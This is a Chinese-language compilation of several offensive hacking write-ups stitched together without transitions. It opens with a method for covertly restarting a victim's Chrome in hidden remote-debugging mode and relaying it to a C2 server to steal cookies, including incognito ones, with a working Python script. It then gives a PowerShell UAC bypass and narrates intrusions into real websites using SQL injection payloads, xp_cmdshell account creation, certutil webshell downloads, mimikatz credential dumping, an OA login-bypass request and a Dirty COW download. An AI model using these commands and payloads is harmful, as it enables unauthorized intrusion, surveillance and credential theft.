在某些工作需求中，需要获取用户当前浏览器中的Cookies。由于目标比较严谨，使用了chrome浏览器的无痕模式，因此无法通过复制cookies文件解密的方式获取明文cookie。

那么，隐私模式真的可以保护你的cookie了吗？

Chrome架构

Chrome浏览器是多进程架构，有三种进程–浏览器、渲染器和插件。这也是为什么打开浏览器后默认就有6个进程的原因。

如果想详细了解架构可以参考下面提供的链接，简单来说就是Chrome会启动一个叫做“浏览器”的主进程，其余的“渲染器”进程就是每一个标签页。（这里简单理解一下，后面会利用到这个技术）

参考

Google 图解这个系列文章挺好的建议读一读。
Google 图解：Chrome 快是有原因的，科普浏览器架构
一种多核浏览器中进程复用的方法及其多核浏览器

方案一：remote debug

chrome内核的浏览器支持远程调试，但是仅支持本地访问（localhost:9222）。通过--remote-debugging-port=9222参数指定端口启动chrome内核浏览器，即可通过localhost:9222页面同步其他浏览进程。

由于chrome内核的浏览器是多进程架构，只有一个浏览器主进程，其余的都是渲染器插件等进程，因此只要第一个启动的进程是通过remot debug方式启动，后面的一切新的标签都会被调试模式记录，重点是包括隐私窗口！

自动化获取指定网站cookie

简单说一下怎么利用，首先要通过你的远控kill掉所有的chrome进程，并通过命令行启动一个无窗口debug模式的浏览器。目标顶多会以为浏览器bug闪退，并且无弹窗不会引起怀疑。下面是一些用的到的命令。

$ wmic process where name="chrome.exe" get executablepath
获取chrome浏览器所在目录
$ taskkill /f /im chrome.exe && chrome.exe --remote-debugging-port=xxxx --no-startup-window
kill掉所有chrome进程，并重新启动无窗口浏览器。利用命令一中获取的路径执行启动命令
$ frpc.exe
端口转发到外网，剩下的就是利用脚本读取指定网站cookie（换成自己c2的ip和端口）。python3 cookies.py localhost:9222

读cookies的脚本源码

import websockets
import asyncio
import requests
import json
from sys import argv

async def getCookies(uri):
    data = {"id": 1, "method": "Network.getCookies"}
    command = json.dumps(data)
    async with websockets.connect(uri) as websocket:
        await websocket.send(command)
        res = await websocket.recv()
        print(f" {res}")

def getUri(url):
    rep = requests.get(url)
    dic = json.loads(rep.text)
    res = {}
    for i in range(len(dic)):
        title = dic[i]['title']
        wsuri = dic[i]['webSocketDebuggerUrl']
        res[str(i)] = wsuri
        print(str(i)+". "+title)
    return res

def main(uri):
    while 1:
        cmd = input("> ")
        if cmd=="quit":
            break
        asyncio.get_event_loop().run_until_complete(getCookies(uri[cmd]))



if __name__ == '__main__':
    url = "http://"+argv[1]+"/json"
    uri = getUri(url)
    main(uri)

参考

Stealing Chrome Cookies
Chrome DevTools

方案二：NetLog

这个也是一个不错的方案，但是我并没有解决无窗口模式的问题，所以容易引起警觉，因此简单说聊一下，具体可以看参考文章。
同样需要先k掉chrome进程，通过命令行指定参数 --log-net-log="C:1.json"，利用NetLog Viewer导入json，读取cookie。

参考

使用 Chrome NetLog 解析隱藏在 DevTools 中的 Header 資訊

方案三：DLL注入HOOK

同事也在研究的一个思路，同时某位表哥也给了我同样的思路。由于这部分的技术本人还很欠缺，因此不过多研究了。大致的思路是，HOOK某函数在浏览器https加密之前，获取明文cookie。希望后面可以填坑。

适用性

所有Chrome内核浏览器皆适用，比如最新的edge，360Chrome等等 : )。想测的话，可以自己测一下。

最终

感谢提供netlog和dll注入思路的表哥，虽然最后一种还在研究中，但学习到了很多。前两种方式也不过是临时方案，方案三才是长久之计。这篇文章只是聊一个思路，给和我同样在某些取证环节需要此方法的人，毕竟大部分同行的工作并不需要这么做。所以按需阅读，谢谢。最后，请遵守法律！

环境

win10 1909 18363.535 Pro

复现

利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe 存在autoElevate属性为true

使用Procmon64.exe添加过滤条件

没找到 HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command

根据微软文档可知用户特定的设置优先于默认设置，而当前用户可以写入这个值，那么可以使用powershell来实现poc。

<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectivly start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#>

function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}

在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功，建议把powershell脚本去掉后面的清空注册表，避免WSReset运行时找不到注册表，不过记得手动清除。

参考

1. https://www.activecyber.us/activelabs/windows-uac-bypass
2. https://github.com/sailay1996/UAC_Bypass_In_The_Wild

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

文章首发于T00LS,未经允许禁止转载

前言

记录某建站公司沦陷的过程。内容简单较为简单，欢迎各位表哥交流指导。

getshell

目标是某建站公司，大致看了一下伪静态，没什么直接撸的欲望，一边扫着端口的同时，一边测了几个案例网站。 好在没让我失望，注入一枚

这个时候端口也扫完了，有两个端口引起了我的注意，999和6588。分别是phpmyadmin和护卫神。 尝试了一下弱口令都无果，整理了一下收集到的信息，以及可利用的点。 案例站大部分与建站公司的网站在同一个服务器上，服务器为 iis7.5,windows2008（存在解析漏洞） 此时有几种方式getshell： 1.直接注入into outfile 2.前台随便找一个上传点传一个包含一句话的图片 3.注入案例站读取管理员密码后台上传 4.挖其他漏洞如：远程文件包含等可直接getshell漏洞 第一二条都失败了，案例站的数据库用户没有读写权限，前台无上传点，由于第四条相对于来说需要另外的时间去挖并且远程包含这种基本没戏，所以最终只能后台getshell了。执行命令发现无法执行，应该是权限不够？上传了aspx大马，访问500，心态炸裂。

提权思路： 1.phpmyadmin直接udf提权（无权限读写） 2.登录护卫神，和流光表哥@赢时胜流光同样的方法 3.搞一个可以解析aspx，权限高一点的网站？等 最后利用2，3结合搞定。

登录护卫神后台+提权

护卫神的漏洞利用条件是可以上传可执行脚本，来读取本地登录护卫神的cookie。shell已经拿到了，直接上传脚本读取cookie。f12 document.cookie 刷新:

这个护卫神是3.7版本的，没有找到上传点，但是不慌，有ftp账号密码，并且找到了支持asp,aspx的网站，直接上大马。可以执行命令，补丁打了倒是不少，查了一下可以利用的exp，用论坛里的几个免杀的烂土豆exp都失败了，webshell版的也报错。

最后弹到cs上，随手试了一下cs自带的提权exp ，ms14那个，尼玛成了。

tasklist /svc查看一下远程端口，由于是外网，直接登录。

读了管理员的密码，清理痕迹溜了。（密码是随机的十二位大小写加特殊字符，这谁顶得住啊） 

总结

水文，每次搞完回头再看的时候都觉得没什么技术含量，的确也是没有什么骚操作，总结一下这次渗透，只有这个读取cookie的php脚本，我学到了，嘻嘻嘻，溜溜球~

500报错，可能跑不出来，于是试试手工，sqlmap被拦了，但是手工很顺利，可能是加了sqlmap的指纹了吧；

https://img.chabug.org/img/20181021194543.png

判断版本’ or @@version>0 —

计算机名 ‘ or @@SERVERNAME>0 —

爆当前数据库名 ‘ or db_name()>0 —

网站没有找见后台，想着跑出来密码也没有登录地方，于是那些查找数据库、表名、字段名就直接略过，跑出来也登不进去。

先看看其他网站，于是先跑一下二级域名以及旁站，bing查询确实很棒，可以查出好多旁站，极力推荐；

发现三处旁站，一个php的、一个oa还有一个致远协同，没有可以利用的地方，还是先看看注入吧；

先看注入, 当前用户  ‘ or user_name()>0 —

判断是否支持多句查询

’;declare @s int;--

查看一下xp_cmdshell是否开启

首先开启一下xp_cmdshell

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

显示登录成功，则是命令执行成功，成功开启xp_cmdshell，然后可以执行命令了，但是执行命令没有回显，正常现象；

直接添加用户，显示执行成功，但是没有用户添加上，郁闷，之后才发现是火绒的问题。

';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--

';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd回显：

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表

';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中

' and (select substring((select a from temp for xml auto),1,8000))>0;-- 可以一次得到所有的结果

';drop table temp;--  删除表

目标显示开启了1433,3389,3306端口，于是可以添加sa用户然后远程连接，增加sa用户：

';exec master.dbo.sp_addlogin test,password;--

';exec master.dbo.sp_addsrvrolemember test,sysadmin;--

可以直接连接，方便好多，比刚才执行命令舒服了好多；

完美，可以直接执行命令，美滋滋。CS或者Msf直接撸之，但是没有vps就很心疼啊，只能找个shell远程下载了。

发现旁站php的配置文件，然后还有phpmyadmin，这里有几个思路拿shell:

• 直接远程下载到web路径；
• 旁站phpmyadmin后台拿shell;
• 旁站登录后台拿shell;

第一个：

直接下载，然后，或者直接下载wce或者procdump.exe直接读取管理员密码然后登录，美滋滋。

certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php

move conf1g.php  E:\xxxxx\   失败

直接500报错，看来是有waf，难怪slamp一直跑不出来，直接换个过狗的吧

第二个:

phpmyadmin后台登录几种建表方式没有成功，然后日志写shell也没有成功

第三种

php站进入后台拿shell，密码还没有解开，暂时无法登录拿shell

最近发布的冰蝎管理shell，免杀还是不错的，大马带小马，可以简单操作了

抓hash

wce  失败

Procdump导出，使用mimikatz

mimikatz# sekurlsa::minidump lsass.dmp

mimikatz# sekurlsa::logonPasswords full

成功拿到密码登录

团队一起日站的时候发现了一个oa，然后就一顿乌云找到了这个，成功getshell。

变量覆盖

登录构造请求数据包

POST /logincheck.php HTTP/1.1
Host: xx.xx.com
Content-Length: 182
Cache-Control: max-age=0
Origin: http://xx.xx.com/
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xx.xx.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SID_1=8b3cb1d3; PHPSESSID=he68espbvu9oq0rgamruvhs114
Connection: close

USERNAME=admin&PASSWORD=&MYOA_MASTER_DB[id]=1&MYOA_MASTER_DB[host]=123.123.123.123&MYOA_MASTER_DB[user]=root&MYOA_MASTER_DB[pwd]=rootpassword&MYOA_MASTER_DB[db]=oa&encode_type=1&button=

其中的MySQL数据库链接配置需要自己搭建外网MySQL，并且开通root外链。

TD_OA.sql 下载导入

getshell

后台有 sql 导入功能, 有两种方法, 使用 into outfile 或者用 general_log

update mysql.user set file_priv='Y' where user='root';
flush privileges;
select concat("'",0x3C3F7068702061737365727428245F504F53545B615D29203F3E) into outfile '../webroot/test.php';
update mysql.user set file_priv='N' where user='root';
flush privileges;

set global general_log = on;
set global general_log_file = '../webroot/test.php';
select '<?php assert($_POST[a]) ?>';
set global general_log = off;

原文xz：https://exp10it.cn/index.php/archives/948/ 有删减

下午看见 chabug 群里直播日站 这个站点好像一直没搞下
想着主站应该什么思路都试过了，那我们就看看旁站

搞下后发现并不能跨目录

回到主站

后台

主站注入

有过滤

大小写绕过

sqlmap没 dump 出来

估计很多人到这里就放弃了…

自己写个小脚本跑内容

原理就是手工注入


后台只有 fckeditor 还是 1.0 的 果断放弃

于是扫目录

filepath 截断

访问 404

a.asp; 这样也不行 服务器是 iis7 的

想到旁站里有 php 的站点 试试解析漏洞

或许这就是大佬吧。

大佬召唤，我不得不起床。
进入后台，寻找上传点，卧槽，发现FCK编辑器哎

我们的XZ大佬现在连FCK编辑器都拿不下来了吗？那就到我装逼的时候了！
然后GG，点击上传图片竟然。。

怪不得，大佬可是给我扔了个黑锅啊。不过还好，旁边还有一个小文件上传，是个上传点。

可是看到这个布局我突然有一种不详的预感。管他呢，burp一顿怼之后，草草放弃了。
因为不管怎么改文件名怎么截断都不解析啊。算了，再翻翻其他的。

这个语言包管理直觉是能够利用，不过可能还要百度源代码审计，想想放弃了，毕竟人家还是小白呢。

继续翻，我就不信了，发现又一个上传点！

好熟悉啊，和刚才发布文章的页面一毛一样！竟然在这有上传点。

那就开怼把！点击插入图片之后是这个样子

很草率啊，不知道能不能上传。先上传一张正常的试试

竟然ok？！那就再试试直接传php后缀的

也上传成功了，但是没有返回路径？？？不急，我记得有一个文件管理。

果然ojbk了。

有没有很佩服我优秀的打码呢？
虚拟终端

[*] 基本信息 [     Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64(xxx) ]
[/wwwroot/upfiles/201802/11/]$ whoami
damachuli
[/wwwroot/upfiles/201802/11/]$ uname -a
Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux

竟然是Linux机器，2012年的，我们可以试试脏牛详情看这里

下载
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
编译
gcc -pthread dirty.c -o dirty -lcrypt
运行
./dirty 123456

然后尝试链接提示

fuzz@DESKTOP-JJAMRAA:~$ ssh root@114.80.xxx.xxx
ssh: connect to host 114.80.xxx.xxx port 22: Connection refused

netstat -ntpl查看端口

尝试后发现是55022
链接

原文地址

一开始是奔着dz去的，注册了个账号，想试一下任意文件删除然后重装getshell，当然。。。失败了。。最新版dz。

然后有个老铁说有个旁站，是一个发卡平台，抄出我的google大法搜到了别人破解的源码。 然后丢到环境里搭起来晾着。

nmap扫端口扫到了两个开放http的端口一个是88，一个是888.

打开后发现888是宝塔的管理面板。

当时我就装了个宝塔打算巴拉巴拉一波，静态跑一遍之后忽然想起今天要上班还是不看宝塔了，转而去发卡平台源码巴拉巴拉。

上代码审计工具看了下，没有过滤，注入是肯定有的，但是我并不想注入。。。因为。。。我不会mysql。。。

随便贴张图吧

那么问题来了，注入不搞的话怎么去getshell或者弄管理员密码呢？

全部巴拉巴拉了一遍源码之后发现一个文件没有校验登陆状态。唔。。。没错 那是个ajax.php

只要参数正确就可以传递内容过去。

这是密码修改的后端代码

请求大概是这样

就这样我们修改成功了。。。。

然后就是怎么get个shell。。。

看了几个功能之后觉得可以试试上传文件。。但是上传绕过太烦。。

代码如下

这时看到了一个echo的东西。。。这是个很重要的突破点

代码如下

之前我们说过这个程序没有过滤之类的操作，

so。。看一下这个emailconfig.php是长什么样

我突然想到了存储型xss，从存储型xss想到了前后代码补全get个shell。。。

先搓一个五毛钱的phpinfo

提交之后返回修改邮件的标签可以发现如下情况

ojbk再搓一个一块钱的shell

然而很不幸的是。。。500错误了。。。在看了一下phpinfo打印的信息发现。。。

全都GG了。。

这种情况很尴尬。。。非常的尴尬。。。

欣赏了一会音乐之后想起我为什么不读一下文件试试？毕竟mysql是开放的，于是乎。。。去读了dz的配置文件

还行啦这玩意居然是root账号。。。

当时我就操出我的mysql udf准备扫操作一波。。。但是忽然发现root不能远程登陆。。于是再搓一个远程登陆的查询语句

$link=@mysqli_connect('localhost','root','root');mysqli_select_db($link,'mysql');mysqli_set_charset($link,'utf8');mysqli_query($link,"update user set host = '%'where user= 'root';");mysqli_query($link,"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION;");mysqli_query($link,"flush privileges;");

大概是这样 ，然后刷新一下php页面就能远程连接了。

这时我还要读一下目录看看plugin文件夹在不在。。。于是又搓了一个读文件夹的代码

print_r(glob($_GET['id']. '/*' , GLOB_ONLYDIR));
唔。。事实证明并没有plugin目录。。。gg。。

这时我又继续听歌。。突然我想起这玩意目录里有个aspnet_client

能不能搓个asp？

于是又搓了一行代码用来创建asp文件

file_put_contents('one.asp', '');
于是。。生成了一个asp的shell。。访问成功

这时。。。开始创建个mysql的plugin目录用于传udf。。。然而折腾了一会之后发现udf加载失败。。。头大。。。放弃这个方案。

这是我们开始打宝塔的主意，

巴拉巴拉找到了宝塔的数据库文件。。是个sqli。。直接打开发现是MD5加密的密码。。。。唔。。。cmd5查不到。。。

突然间我又突发奇想。。。宝塔的网站目录能不能读？

事实证明是可以的。。。

于是去看了下login.php

唔。。。直接改登陆认证。。。

然后就登陆上了宝塔的面板。。。。

翻了一圈没找到个执行命令的地方 有个计划任务还不执行。。这就很蛋疼。。。

抽了两根烟。。又翻了下宝塔的文件夹。。。突然灵光一现。。这TM宝塔还有个独立的php环境。。。搓开php.ini发现没有过滤。。。。ojbk直接传个php到宝塔面板根目录

我们终于从iis_user变成了system。。。

唔。。接下来就简单了。。。创个用户。。远程登陆。。。脱裤脱源码。。。。收工

首先扫目录

有上传页面 白名单 上传失败

wvs 检测到注入点

表没跑出来

首页有 用户注册

个人中心

发布信息 那里上传调用的也是 /inc/upload.asp

没啥思路 于是就检测旁站 扫到 shell

不灭之魂 右键源代码 font 后面就是密码

?profile=a 爆密码

freehost 星外虚拟主机

提权渣…

Media Index 目录可以执行文件

上传 cmd.exe

不过1秒后就被杀软干掉了

因为是星外的主机 支持 php 尝试写一个死循环不断写入二进制文件

文件生成成功 但拒绝访问

百度发现星外主机还有一个跨目录漏洞

星外虚拟主机跨目录技巧

目标站是 q 开头的 找到这些可疑路径

打包源码 下载 查看数据库

md5 无法解密

仔细看 xinyu 用户

旁站找到一个网站

建站公司 竟然改成房产了…

想了想 可能是后门账户

于是下载它的源码

翻了一会 发现网站配置文件

邮件服务器的账号密码

目标站

建站公司

JJJdhy217315

somd5

和之前解不出来的 md5 一样

直接拿密码登录后台

有数据库备份

尼玛没权限

本地继续翻源码 看看有没有其他上传点

翻到 house 目录 发现 dhb1.asp

dhb 电话簿

后台

和源码里的一样

插入一句话

保存成功

连接